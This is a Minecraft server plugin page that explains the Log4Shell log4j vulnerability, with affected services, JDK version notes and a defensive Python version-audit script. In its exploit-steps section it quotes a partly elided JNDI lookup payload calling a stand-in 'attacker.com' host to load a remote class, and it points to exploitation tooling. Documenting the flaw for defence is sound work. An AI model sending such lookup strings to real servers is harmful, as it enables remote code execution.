CrashExploitFix

Fixes the recent exploit which can cause your server to crash.

More updates soon!

Info About The Exploit:

  • A few hours ago, a 0-day exploit in the popular Java logging library log4j was discovered that results in Remote Code Execution (RCE) by logging a certain string.
  • Given how ubiquitous this library is, what the exploit yields (full server control), and how easy it is to carry out, this vulnerability is quite severe. We're calling it "Log4Shell" for short (CVE-2021-44228 just isn't as memorable).

    Who is impacted?
    Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable.

    Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach.

    Many Open Source projects like the Minecraft server, Paper, have already begun patching their usage of log4j.

    Updates (3 hours after posting): According to this blog post (in English), JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. In these versions, com.sun.jndi.ldap.object.trustURLCodebase is set to false, meaning JNDI cannot load a remote codebase using LDAP.

    However, there are other attack vectors targeting this vulnerability which can result in RCE. Depending on what code is present on the server, an attacker could leverage this existing code to execute a payload. An attack targeting the class org.apache.naming.factory.BeanFactory, present on Apache Tomcat servers, is discussed in this blog post.
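As an added example (not part of the plugin or of the original post), the following Python script applies the JDK thresholds quoted above to a server inventory and flags any JVM where the trustURLCodebase property has been forced on. The host labels and version strings are constructed, and the function names are hypothetical.

```python
import re

# Thresholds as stated on this page: releases greater than these ship with
# com.sun.jndi.ldap.object.trustURLCodebase=false by default.
LEGACY_UPDATE = {6: 211, 7: 201, 8: 191}  # 1.<family>.0_<update> numbering
MODERN_FLOOR = (11, 0, 1)                 # <major>.<minor>.<patch> numbering

def parse_version(text):
    """Accept a java.version value or a `java -version` banner line."""
    quoted = re.search(r'version "([^"]+)"', text)
    value = quoted.group(1) if quoted else text.strip()
    legacy = re.match(r"1\.(\d+)\.\d+(?:_(\d+))?", value)
    if legacy:
        return "legacy", (int(legacy.group(1)), int(legacy.group(2) or 0))
    modern = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", value)
    if not modern:
        raise ValueError(f"unrecognised Java version: {text!r}")
    return "modern", tuple(int(p or 0) for p in modern.groups())

def ldap_codebase_status(version_text, trust_url_codebase=None):
    """Return 'forced-on', 'default-off' or 'not-covered' for one JVM."""
    if str(trust_url_codebase).lower() == "true":
        return "forced-on"  # an explicit -D override re-enables remote codebases
    scheme, num = parse_version(version_text)
    if scheme == "legacy":
        family, update = num
        floor = LEGACY_UPDATE.get(family)
        covered = floor is not None and update > floor
    else:
        covered = num > MODERN_FLOOR
    # 'not-covered': the statement above does not apply, treat the vector as open
    return "default-off" if covered else "not-covered"

# Constructed inventory: (host label, version string, -D property value if set)
INVENTORY = [
    ("lobby", 'openjdk version "1.8.0_181"', None),
    ("survival", 'openjdk version "1.8.0_312"', None),
    ("proxy", 'java version "11.0.13" 2021-10-19 LTS', "true"),
    ("creative", 'openjdk version "17.0.1" 2021-10-19', None),
    ("archive", "9.0.4", None),
]

def audit(inventory=INVENTORY):
    return {host: ldap_codebase_status(v, p) for host, v, p in inventory}

if __name__ == "__main__":
    for host, status in audit().items():
        print(f"{host:10s} {status}")
```

A `default-off` result only covers the LDAP remote-codebase vector; as noted above, other vectors remain, so log4j itself still needs patching.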

    How the exploit works

    Exploit Requirements
    • A server with a vulnerable log4j version (listed above),
    • an endpoint with any protocol (HTTP, TCP, etc.) that allows an attacker to send the exploit string,
    • and a log statement that logs out the string from that request.

    Exploit Steps
    1. Data from the user gets sent to the server (via any protocol),
    2. The server logs the data in the request, containing the malicious payload: '${jn...:ldap://attacker.com/a}' (where attacker.com is an attacker-controlled server),
    3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),
    4. This response contains a path to a remote Java class file (e.g. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
    5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

    Due to how common Java vulnerabilities such as these are, security researchers have created tools to easily exploit them. The marshalsec project is one of many that demonstrates generating an exploit payload that could be used for this vulnerability. You can refer to this malicious LDAP server for an example of exploitation.

Servers Using CrashExploitFix
  • play.magmacraft.club

Resource Information
Total Downloads: 1,063
First Release: Dec 10, 2021
Last Update: Dec 11, 2021
All-Time Rating: 2 ratings